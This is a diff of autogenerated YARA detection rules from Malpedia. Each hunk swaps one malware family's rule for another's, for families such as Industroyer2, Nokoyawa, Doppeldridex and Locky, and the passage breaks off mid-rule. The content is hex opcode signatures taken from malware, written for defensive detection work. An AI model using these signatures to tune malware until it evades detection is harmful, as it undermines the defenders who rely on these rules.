"https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.collectorgoomba_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "c395df9bf0cea55ef8201fced5f6d58ff4786707da9a8f0c23e3a94a9aa3418e" + logic_hash = "b5a8ed8c5e59ef8c9c917b7f2556669b4a98ddcbc5ddbd63af8e98206da01974" score = 75 quality = 75 tags = "FILE" @@ -150727,32 +153541,32 @@ rule MALPEDIA_Win_Vflooder_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 60 ff35???????? 8f442438 9c } - $sequence_1 = { 3b45f0 60 9c 8d642424 } - $sequence_2 = { 9c 60 9c 9c 8d642430 } - $sequence_3 = { 9c ff742404 8d642434 e9???????? } - $sequence_4 = { e9???????? ff742408 8f4500 60 } - $sequence_5 = { 0000 43 7265 61 7465 } - $sequence_6 = { f5 83ef04 f5 ff37 } - $sequence_7 = { e8???????? 0000 43 7265 } - $sequence_8 = { b02e f5 f2ae e8???????? } - $sequence_9 = { 9c f2ae 9c 9c } + $sequence_0 = { eb91 8b450c 833801 7e04 834dfcff 837dfc00 7c1c } + $sequence_1 = { 8b8084000000 8945fc 837dfc00 756e 8b4508 83787c00 7465 } + $sequence_2 = { ff30 ff75f8 ff75fc ff7508 e8???????? 83c410 8b4508 } + $sequence_3 = { 83c007 894588 ff758c ff7588 8d8528fdffff 50 8d4dc4 } + $sequence_4 = { ffb574ffffff e8???????? 59 59 8845e6 8a45e6 8845e5 } + $sequence_5 = { c705????????020a010d c705????????04050f01 833d????????00 740a c705????????04060b08 c705????????0206030b c705????????08050a0e } + $sequence_6 = { ff704c 8b4508 ff30 e8???????? 59 59 8945d4 } + $sequence_7 = { e8???????? 83c40c ebd1 33c0 40 c1e005 c64405d000 } + $sequence_8 = { ff75fc e8???????? 59 59 ebad ff75d0 6a00 } + $sequence_9 = { 8bec 83ec10 8b4508 8945f0 8b45f0 8b8018010000 8945f4 } condition: - 7 of them and filesize <860160 + 7 of them and filesize <1400832 } -rule MALPEDIA_Win_Isr_Stealer_Auto : FILE +rule MALPEDIA_Win_Retro_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f92134ff-d8ee-58cb-8cb8-468d7205306f" + id = "a4751029-21e3-5dc7-8b10-667fe3852f4c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.isr_stealer" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.isr_stealer_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.retro" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.retro_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "75691989209029cb7a637cf5df87a857ef3ef18b6fe3194f56cba1ecab86658c" + logic_hash = "a167f37f4c1b5df11b8ae00c368ae3ba7079a871854da90fb0bcfd20e0f3d7b0" score = 75 quality = 75 tags = "FILE" @@ -150766,32 +153580,32 @@ rule MALPEDIA_Win_Isr_Stealer_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { fb b05e 2bc1 e8???????? 661e } - $sequence_1 = { 08ac22c115978d 0e e8???????? 07 } - $sequence_2 = { 1c8b 53 2456 2bd1 807e6543 } - $sequence_3 = { 46 1e 301b 15c2c8c807 d6 12d8 } - $sequence_4 = { 8d16 b205 07 d32cb6 08ac22c115978d 0e e8???????? } - $sequence_5 = { a7 8d16 b205 07 d32cb6 08ac22c115978d } - $sequence_6 = { 07 fb b05e 2bc1 e8???????? } - $sequence_7 = { 8d16 b205 07 d32cb6 08ac22c115978d 0e } - $sequence_8 = { 07 d32cb6 08ac22c115978d 0e e8???????? } - $sequence_9 = { e8???????? 07 fb b05e 2bc1 e8???????? 661e } + $sequence_0 = { 49ffcb 8941ec 418b440af0 8941f0 418b440af4 } + $sequence_1 = { 8b442420 4863c8 ba04000000 e8???????? 4c8bb42478400000 4c8ba42480400000 488bb42488400000 } + $sequence_2 = { 488b742468 488dab00120000 f30f100d???????? 4963c5 448b848308130000 418d4701 410fafc0 } + $sequence_3 = { f30f58c2 f30f58c1 f30f58c5 4883c478 c3 660feb15???????? f30f5c15???????? } + $sequence_4 = { f3410f1081f8550100 410f2fc0 7604 f30f59e8 8d442eff 4863c8 } + $sequence_5 = { 418bd4 e8???????? 33c9 85c0 0f8514010000 4c8d2df2e70300 } + $sequence_6 = { f30f59e8 418d4424ff 4863c8 483bcd 7c2e 0f1f00 660f6e0c8b } + $sequence_7 = { 4881c460260000 415f 415e 415d 5f 5e 5b } + $sequence_8 = { 48c1f905 4c8d05db7f0500 83e21f 486bd258 490314c8 488d0d79700200 eb11 } + $sequence_9 = { f20f1035???????? 0f297c2430 0f57ff 33ff 83bab412000002 488bda 4c8bc9 } condition: - 7 of them and filesize <540672 + 7 of them and filesize <1409024 } -rule MALPEDIA_Win_Flashflood_Auto : FILE +rule MALPEDIA_Win_Industroyer2_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "2b564813-7b00-54ab-b562-7a8de5369185" + id = "01c28e59-8cb1-5bf1-9de6-64ce0dd77d4a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.flashflood" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.flashflood_auto.yar#L1-L124" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.industroyer2" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.industroyer2_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "3006626d1ecba778668c15e0aafe5a9ff5cdfe4debbbd864318346fc290d9ab7" + logic_hash = "bbf01a0f560944dbb85cdfc8fdeff74a884348b77c6b1a1a74790ea421be78c4" score = 75 quality = 75 tags = "FILE" @@ -150805,32 +153619,32 @@ rule MALPEDIA_Win_Flashflood_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff15???????? 8145f800809b07 8d45f8 50 } - $sequence_1 = { 56 e8???????? 40 8945f8 0fbe06 50 } - $sequence_2 = { c3 b8???????? c3 55 8bec 81ec88020000 } - $sequence_3 = { 8bec 81ec10060000 56 6a5c ff750c ff15???????? 8bf0 } - $sequence_4 = { 6bc90c 8b91f0914000 8955f4 8b450c 6bc00c } - $sequence_5 = { ff5164 85c0 0f85c5010000 8d55f4 8b45ec 52 } - $sequence_6 = { 33c0 eb0a 57 ff15???????? 6a01 58 5f } - $sequence_7 = { 85f6 59 0f842b020000 ff7508 8d85f0fbffff 50 e8???????? } - $sequence_8 = { 50 e8???????? 8d85c0fdffff 50 8d85c0fbffff ff7508 } - $sequence_9 = { 83c62c 6a2e 56 ff15???????? 8b3d???????? 59 } + $sequence_0 = { 732c 837df800 7426 8b45fc 8b4df4 8b1481 89559c } + $sequence_1 = { 89480c 8b55fc 8b451c 894210 694d18a0860100 034d1c } + $sequence_2 = { eb07 c745d000000000 8b4508 8a4dd0 888845000100 } + $sequence_3 = { 8b4d08 e8???????? 8945fc 68???????? 8b4508 50 } + $sequence_4 = { 885103 8b45fc 8b4804 8b551c 8b8238000100 894104 8b4dfc } + $sequence_5 = { c1e200 8b45fc 8b4d08 8a1411 885005 b801000000 d1e0 } + $sequence_6 = { 8b4df0 51 ff15???????? 85c0 7406 c645ff01 eb04 } + $sequence_7 = { c6400c00 8b4dfc c641140a 6a04 8b55fc 83c210 52 } + $sequence_8 = { 837df800 742c 8b55fc 8b45f4 8b0c90 898d78ffffff 8b9578ffffff } + $sequence_9 = { 8b45fc 50 e8???????? 0fb6c8 85c9 7444 68???????? } condition: - 7 of them and filesize <114688 + 7 of them and filesize <100352 } -rule MALPEDIA_Win_Aperetif_Auto : FILE +rule MALPEDIA_Win_Nokoyawa_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "dd57eb34-4374-5f40-adeb-74673af556ba" + id = "71f47de5-b877-5435-a43f-09577ab6e252" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.aperetif" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.aperetif_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nokoyawa" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nokoyawa_auto.yar#L1-L121" license_url = "N/A" - logic_hash = "cb1f1d595273c378c0af7214424a9c75d431ec33b0d3744330f8349a67692fb4" + logic_hash = "a3e5835d9868e848c4cf7b1e58144cc15b3f0d5c2b0274b447bdec70231f3ad8" score = 75 quality = 75 tags = "FILE" @@ -150844,32 +153658,32 @@ rule MALPEDIA_Win_Aperetif_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b4108 8975e4 c70100000000 c7410400000000 8945ec c7410800000000 c645f301 } - $sequence_1 = { e8???????? 8a45d8 884524 8b0e c645fc02 85c9 0f8412010000 } - $sequence_2 = { 50 8d45f4 64a300000000 8bd9 895db8 8b7508 837e1000 } - $sequence_3 = { f20f118424f8080000 8b0cb0 85c9 7422 8b742464 90 0fb7047e } - $sequence_4 = { ff74242c 57 e8???????? 83c410 eb14 8b8724000800 b900000200 } - $sequence_5 = { 8954242c 660f1f440000 53 ff742424 68c0000000 56 55 } - $sequence_6 = { ff742410 ff742424 e8???????? 83c408 897c2410 89742450 8b44245c } - $sequence_7 = { e8???????? ff742434 53 e8???????? ff742428 53 e8???????? } - $sequence_8 = { ff5210 8b4dc8 c7451803000000 85c9 7418 8b11 8d45a4 } - $sequence_9 = { e8???????? c7868400000000000000 8b37 8b8e84000000 85c9 7506 8b8e88000000 } + $sequence_0 = { 33c8 8bc1 8b4c2420 488b9424c0000000 88040a e9???????? 33c0 } + $sequence_1 = { 488b4c2460 e8???????? 488b442468 4883e0c0 } + $sequence_2 = { 890424 8b0424 83c003 99 83e203 03c2 c1f802 } + $sequence_3 = { 488b4c2448 488b0c01 e8???????? 85c0 7511 c605????????01 e8???????? } + $sequence_4 = { 89442434 e8???????? 488905???????? 8b442434 } + $sequence_5 = { 48894c2408 4883ec18 48c7042400000000 488b442420 488b0c24 0fb70448 } + $sequence_6 = { 8b442420 83c014 89442420 837c242040 } + $sequence_7 = { 880424 488b442410 48c1e005 4803442410 0fb60c24 4803c1 4889442410 } + $sequence_8 = { 486bc907 8b4c0c20 8b440420 33c1 b904000000 } + $sequence_9 = { 8b9424a0000000 03d1 8bca 8d8408a1ebd96e 8b4c2414 03c8 } condition: - 7 of them and filesize <10500096 + 7 of them and filesize <92160 } -rule MALPEDIA_Win_Teleport_Auto : FILE +rule MALPEDIA_Win_Odinaff_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "20d896b0-1f61-5a48-80a3-7c8e4c6de03e" + id = "c28375cd-e1a8-5dbb-b117-119bc2a2a6cd" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.teleport" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.teleport_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.odinaff" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.odinaff_auto.yar#L1-L120" license_url = "N/A" - logic_hash = "a391399ac3b60b63dbd3a4a77f0c3e70c536a7803fbc2f2dce00674fad1b8479" + logic_hash = "de88658965024bda0c5434053043d1a37aa258e92b5fc7491f70abd6c372a45d" score = 75 quality = 75 tags = "FILE" @@ -150883,32 +153697,32 @@ rule MALPEDIA_Win_Teleport_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 50 8945fc 68???????? c745f001000000 } - $sequence_1 = { 57 8bfa 897de8 89b7a0000000 8b4104 8987a4000000 8b5108 } - $sequence_2 = { 8806 46 89b504ffffff 8b8d04ffffff 0fb6f0 8d85f8feffff 56 } - $sequence_3 = { c685effeffff00 50 6a00 6a00 c785e0feffff14000000 c785e4feffff00000000 c785f0feffff01000000 } - $sequence_4 = { 8d8d80f7ffff 899d68f7ffff e8???????? 83cb08 f6c304 740e } - $sequence_5 = { 8b35???????? 6a28 85f6 7451 c78560f7ffff80b54200 e8???????? 898584f7ffff } - $sequence_6 = { 668945a8 eb17 837e3408 8d4620 c7401000000000 7202 8b00 } - $sequence_7 = { 330c8560c24200 0fb6c2 330c8560b64200 8bc3 c1e810 894de0 898f94000000 } - $sequence_8 = { 1bc0 83c801 85c0 0f8400010000 b8???????? 8d8d60fdffff 6690 } - $sequence_9 = { 894110 7208 8b09 898d74ffffff 8d0436 50 } + $sequence_0 = { ff15???????? 3d1f040000 7505 bf01000000 } + $sequence_1 = { 740c 57 6a00 ffd3 50 ff15???????? 6a00 } + $sequence_2 = { 6a08 33ff 57 57 ff15???????? } + $sequence_3 = { 8bd8 ff15???????? 53 6a00 6a00 56 ff15???????? } + $sequence_4 = { 49 81c900ffffff 41 8a8138474000 } + $sequence_5 = { 8b1d???????? 83c40c 6820bf0200 56 ffd3 b900000800 2bc8 } + $sequence_6 = { c745dc01000000 e8???????? 6a44 8d4580 53 50 e8???????? } + $sequence_7 = { 7508 ff15???????? eb7b 6a04 } + $sequence_8 = { e8???????? 8b45f8 83c410 85c0 7408 50 6a00 } + $sequence_9 = { 8b4d0c 6a00 6880000000 6a02 } condition: - 7 of them and filesize <458752 + 7 of them and filesize <73728 } -rule MALPEDIA_Win_Mariposa_Auto : FILE +rule MALPEDIA_Win_Kurton_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "2a3a2192-1985-5afb-a3c8-457f3f4c729c" + id = "f013ccb0-04a7-5f02-910f-ce10f5a3eef2" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mariposa" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mariposa_auto.yar#L1-L118" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kurton" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.kurton_auto.yar#L1-L122" license_url = "N/A" - logic_hash = "343ac33f57cd9cc9bfc1841bf1bd211734de245f417ee554220587a46ed4086f" + logic_hash = "dc4903969616e73929d77cdaee0d726bcae8e439ec6bc053e08d133b52122f5e" score = 75 quality = 75 tags = "FILE" @@ -150922,32 +153736,32 @@ rule MALPEDIA_Win_Mariposa_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 55 8bec 53 56 bb???????? 43 } - $sequence_1 = { ffd3 33c0 50 e8???????? 33c0 } - $sequence_2 = { 53 56 bb???????? 43 } - $sequence_3 = { 885c0cff e2f1 ba???????? 2bd6 8bdc 03da 4b } - $sequence_4 = { 8a1c0e 02d8 32dc fec0 885c0cff e2f1 } - $sequence_5 = { 8bdc 03da 4b 54 ffd3 33c0 } - $sequence_6 = { 885c0cff e2f1 ba???????? 2bd6 } - $sequence_7 = { 8a4301 8a6302 f6d0 02c4 d0f8 8a1c0e } - $sequence_8 = { 53 56 bb???????? 43 803b00 } - $sequence_9 = { 03da 4b 54 ffd3 33c0 } + $sequence_0 = { 89542430 8d8c24b8000000 89542434 50 8954243c } + $sequence_1 = { 83c8ff eb1f 8bce 83e61f c1f905 8bc6 8b0c8da05b0210 } + $sequence_2 = { 33c0 8dbc2458010000 c744242800010000 f3ab 8d442428 8d8c2458010000 50 } + $sequence_3 = { 889c2478040200 e8???????? 89b42474040200 e9???????? b91f000000 } + $sequence_4 = { 64a100000000 50 64892500000000 81ecb8000000 8a442403 53 } + $sequence_5 = { 84c0 752b 8b442414 3bc3 } + $sequence_6 = { 8d88740a0000 8988280b0000 33c9 c780180b0000902f0210 } + $sequence_7 = { 83c410 c20400 68???????? e8???????? 6a00 6a00 6a01 } + $sequence_8 = { b91f000000 33c0 8dbc24ad000000 889c24ac000000 f3ab 66ab } + $sequence_9 = { 895de0 895ddc 895dfc 897de4 740a 803800 7405 } condition: - 7 of them and filesize <311296 + 7 of them and filesize <344064 } -rule MALPEDIA_Win_Thunker_Auto : FILE +rule MALPEDIA_Win_Deputydog_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "ef50f850-b9ad-5639-a44d-12383e7ab286" + id = "3ae1b77f-6003-5f42-85fd-2473ea8bd4ab" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.thunker" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.thunker_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.deputydog" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.deputydog_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "9bc1b7f9eb35f46db81209055d59765c3ce32324a39fc618186d9d412df8d09c" + logic_hash = "027f4c297ed3d9095922a3567db93a8700528916bc6b48fe318198129cac1716" score = 75 quality = 75 tags = "FILE" @@ -150961,32 +153775,32 @@ rule MALPEDIA_Win_Thunker_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 89c7 50 68???????? 8dbd00feffff 57 e8???????? 83c420 } - $sequence_1 = { e8???????? 89c6 83feff 7420 } - $sequence_2 = { 8d8500feffff 50 56 e8???????? 89c7 83ffff } - $sequence_3 = { e8???????? 83c40c 89c7 e8???????? 8985ecfdffff } - $sequence_4 = { d1ea 8995e8fdffff 56 e8???????? 6a08 68???????? 68???????? } - $sequence_5 = { 68204e0000 68d3710000 50 e8???????? 6a00 68804f1200 68dd710000 } - $sequence_6 = { 83c40c 8d8544edffff 50 e8???????? 8985c4edffff 8b400c } - $sequence_7 = { 7433 7c79 3df1710000 7447 } - $sequence_8 = { 8d85f0edffff 50 57 e8???????? 83bdf0eeffff05 752e } - $sequence_9 = { e8???????? 68???????? e8???????? 83c41c 68???????? 68???????? e8???????? } + $sequence_0 = { 51 56 8bf1 8b461c 8d4e18 ff30 8d45fc } + $sequence_1 = { 85ff 7407 8b5510 8a12 8817 } + $sequence_2 = { 53 8d4de0 ff15???????? 807df300 7509 } + $sequence_3 = { 57 56 e8???????? 83c40c 8d4604 c60664 50 } + $sequence_4 = { 8d4580 50 e8???????? 8b4004 59 3bc3 59 } + $sequence_5 = { 6a00 56 ff7604 50 ff15???????? 8365f000 6800200000 } + $sequence_6 = { 8b7e08 8d1419 397d08 7417 8bc2 2bc1 2bc3 } + $sequence_7 = { 8b4d0c 57 ff30 6a00 ff15???????? 8b7d08 8b4f04 } + $sequence_8 = { 53 51 ff75e4 50 ff7618 ff15???????? 8b3d???????? } + $sequence_9 = { 57 50 ff15???????? 59 84c0 59 740b } condition: - 7 of them and filesize <73728 + 7 of them and filesize <90112 } -rule MALPEDIA_Win_Locky_Decryptor_Auto : FILE +rule MALPEDIA_Win_Phandoor_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "7272c171-5952-5404-84f8-64d1272487e9" + id = "1f3ac76b-bd09-5712-8c06-9b7787ce6d6a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.locky_decryptor" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.locky_decryptor_auto.yar#L1-L117" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.phandoor" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.phandoor_auto.yar#L1-L152" license_url = "N/A" - logic_hash = "608b3ec7b9a67c8bdfea65d7f94d3ac9056bb8fb93478235380693008ad0bb57" + logic_hash = "bcca1bd5fcc5f942c80e8300ebd91840d93d57fc52bf130291de8a118788c527" score = 75 quality = 75 tags = "FILE" @@ -151000,32 +153814,37 @@ rule MALPEDIA_Win_Locky_Decryptor_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d7c2420 c684249000000001 e8???????? 6a01 33ff } - $sequence_1 = { 56 6a5c 8bf0 e8???????? } - $sequence_2 = { 58 33db 33c9 8945e0 } - $sequence_3 = { 8d45e0 50 33ff 6880000000 897dc0 ff15???????? 50 } - $sequence_4 = { 66890e 56 8d8ddcfbffff e8???????? 8bc6 } - $sequence_5 = { 50 e8???????? 8364247800 56 50 8d442420 } - $sequence_6 = { 68???????? 8d8504ffffff e9???????? 015ddc 6a00 5b } - $sequence_7 = { 56 e8???????? 8b4df4 83c40c 5f 5e 8bc3 } - $sequence_8 = { 894c2410 3bda 7e6c 33d2 c7442418f0ffffff } - $sequence_9 = { ff15???????? c745fc0a000000 395de4 740f } + $sequence_0 = { 0f8482000000 833d????????00 7479 833d????????00 7470 833d????????00 } + $sequence_1 = { 833d????????00 0f8452010000 833d????????00 0f8445010000 833d????????00 } + $sequence_2 = { 83c40c 83c302 3bbe90010000 72d7 } + $sequence_3 = { 83c404 8d55fc 8bf0 52 56 } + $sequence_4 = { 0f84c7010000 833d????????00 0f84ba010000 833d????????00 0f84ad010000 833d????????00 } + $sequence_5 = { 50 8bf9 c645f400 c745f500000000 e8???????? } + $sequence_6 = { 32d3 32d0 8b45f4 81e1fe010000 c1e018 0b45f8 } + $sequence_7 = { a3???????? a3???????? a3???????? a3???????? 898de8feffff } + $sequence_8 = { 83c404 893e 8b4604 3bc7 740c } + $sequence_9 = { 6a01 51 52 8b5508 } + $sequence_10 = { 668901 5e c3 33d2 } + $sequence_11 = { 33c0 3b35???????? 7327 57 } + $sequence_12 = { 56 8b35???????? 57 68???????? 50 c705????????03000000 } + $sequence_13 = { 6a01 53 51 8bc8 } + $sequence_14 = { 56 8b7308 85f6 7420 } condition: - 7 of them and filesize <278528 + 7 of them and filesize <2124800 } -rule MALPEDIA_Win_Synflooder_Auto : FILE +rule MALPEDIA_Win_Mulcom_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "355e06d2-d319-5e82-9247-ae8f46ddbac0" + id = "8b428090-6e4d-587e-a305-32305b35e9f8" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.synflooder" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.synflooder_auto.yar#L1-L124" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mulcom" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mulcom_auto.yar#L1-L132" license_url = "N/A" - logic_hash = "95bdce90d0fd23dc18864dd54db497d62acdb308355c11b707eb697b526800c1" + logic_hash = "0fb6c90115244992995c28d6d59f0334f00cc1075a3607803abc8b37e1b5b55f" score = 75 quality = 75 tags = "FILE" @@ -151039,34 +153858,34 @@ rule MALPEDIA_Win_Synflooder_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff35???????? ff15???????? 85c0 7442 8b7df4 85ff } - $sequence_1 = { 83e61f 8d3c8520fc4000 8b07 c1e606 } - $sequence_2 = { 750b 56 e8???????? 59 85c0 7407 } - $sequence_3 = { e8???????? 83c408 8b542420 52 68???????? e8???????? } - $sequence_4 = { 53 56 57 7408 33c0 40 e9???????? } - $sequence_5 = { c7465c20b04000 83660800 33ff 47 } - $sequence_6 = { 55 8bec 81ec98050000 a1???????? 33c5 8945fc 8d8568faffff } - $sequence_7 = { 8bf0 89742414 83feff 7524 68???????? e8???????? 83c404 } - $sequence_8 = { ff15???????? 83f8ff 7524 68???????? e8???????? 83c404 } - $sequence_9 = { 33db 85db 7466 8d45f4 50 ff75f8 53 } + $sequence_0 = { 4883ec40 33ff 48c740f007000000 488978e8 488d4c2420 668978d8 4d85c0 } + $sequence_1 = { e8???????? 4c8b4310 488bd3 48837b1808 7203 488b13 4981f804010000 } + $sequence_2 = { e8???????? 488d4de8 e8???????? 488d4dc8 e8???????? 488d4da8 e8???????? } + $sequence_3 = { 48897020 488b05???????? 4833c4 48898510020000 498bf8 488bda 4889542438 } + $sequence_4 = { 33d2 33c9 458bc6 ff15???????? 85c0 0f8412020000 } + $sequence_5 = { e8???????? 488d4c2460 e8???????? 90 488dbea0000000 488d9580010000 } + $sequence_6 = { 4c897de0 488d45d0 48837de810 480f4345d0 448838 8b542440 483b55e0 } + $sequence_7 = { 4d63df 4c015d00 478d6c2fff eb3f 4585e4 7511 8b74243c } + $sequence_8 = { cc e8???????? cc 4c8bc2 488b5108 48395110 0f848b000000 } + $sequence_9 = { 410fb7d0 ff5018 440fb7c0 49ffce 418bff 66453be0 0f45fb } condition: - 7 of them and filesize <163840 + 7 of them and filesize <867328 } -rule MALPEDIA_Win_Soul_Auto : FILE +rule MALPEDIA_Win_Doppeldridex_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "ea0bc590-52b0-5914-b399-85653bff4505" + id = "0bf161f5-a608-54fc-8493-d0ca4c837703" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.soul" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.soul_auto.yar#L1-L234" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.doppeldridex" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.doppeldridex_auto.yar#L1-L158" license_url = "N/A" - logic_hash = "192d2467d64d6ffcab9581013b65d7e42a7f1082991c14dd63a3ef2c42177610" + logic_hash = "fb6ff8ebf9c5a6a0d85322be3122e60be6bc024bdfc953709614ec984b12824b" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -151078,45 +153897,38 @@ rule MALPEDIA_Win_Soul_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 83c404 33f6 897304 8b4304 } - $sequence_1 = { 897304 8b4304 5f 5e 5b } - $sequence_2 = { 40 803800 75f8 c745fc00000000 90 } - $sequence_3 = { 75f8 803e00 8bc6 7409 90 fe08 40 } - $sequence_4 = { d3e2 8515???????? 7405 e8???????? } - $sequence_5 = { 8b03 8b36 50 e8???????? 8bf8 } - $sequence_6 = { 5d c3 57 eb05 85f6 } - $sequence_7 = { ff25???????? ff25???????? ff25???????? ff25???????? 48895c2408 4889742410 57 } - $sequence_8 = { ff45fc 85f6 7506 837dfc04 7cda } - $sequence_9 = { c745fc00000000 8da42400000000 8b4df8 51 } - $sequence_10 = { e9???????? 8b531c c1e002 8bc8 } - $sequence_11 = { 6644896c2438 48837f1808 7319 4c8b4710 49ffc0 4d03c0 } - $sequence_12 = { 4983fc08 7208 498bcd e8???????? b801000000 488b8db0010000 4833cc } - $sequence_13 = { 7475 453bcc 7370 488b5330 4c8b5318 488b7338 } - $sequence_14 = { 48895c2420 ff16 85c0 0f85f7000000 488b442420 4885c0 0f84e4000000 } - $sequence_15 = { 4c8bac2470020000 4c8ba42478020000 488bb424a8020000 488b9c2498020000 488bac24a0020000 488b8c2460020000 4833cc } - $sequence_16 = { 8bc1 c1e805 478d541201 662bc8 } - $sequence_17 = { 0f8889000000 7e74 817d0063736de0 7528 48833d????????00 741e 488d0d49ad0000 } - $sequence_18 = { 3d06010000 7309 4585ff 0f84bd020000 85c0 0f8410040000 458bc5 } - $sequence_19 = { 4883c302 85c0 75ed 85d2 7416 4885ff } - $sequence_20 = { 488bcf ff15???????? 400fb6de 85c0 be00000000 0f44de 48837c247808 } - $sequence_21 = { 488d4de0 e8???????? 90 4c8d056e310200 488bd0 488d4db8 } - $sequence_22 = { 41d3ed 83ff20 7321 85f6 0f84d30c0000 410fb60424 } + $sequence_0 = { 01501c 015020 015024 01500c } + $sequence_1 = { 33d2 3b7c2414 0f4cd3 032c24 03ee 2bea 8bc5 } + $sequence_2 = { 011483 40 3b06 7cf8 } + $sequence_3 = { 010c28 8b4e04 42 8d41f8 d1e8 } + $sequence_4 = { 017c240c 3b5c2408 0f822affffff ff74240c } + $sequence_5 = { 030c24 0fbe01 88442458 85c0 } + $sequence_6 = { 01500c 833920 751c 8bc1 } + $sequence_7 = { 0306 894218 47 3b7c2408 } + $sequence_8 = { 7508 8b45f8 83c40c 5d c3 } + $sequence_9 = { 8b459c 83c474 5e 5f 5b } + $sequence_10 = { 5e 5f 5d c3 8b45e4 8b4dec 8a1401 } + $sequence_11 = { 8945e0 74c2 eb9b 8b45f0 353857544f } + $sequence_12 = { 0fb7c7 89442408 894c240c 8b45ac } + $sequence_13 = { 8b4da0 83f900 898570ffffff 0f840c010000 e9???????? } + $sequence_14 = { 7452 eb22 668b45c6 66c1e801 0fb7c8 } + $sequence_15 = { 8b5dbc 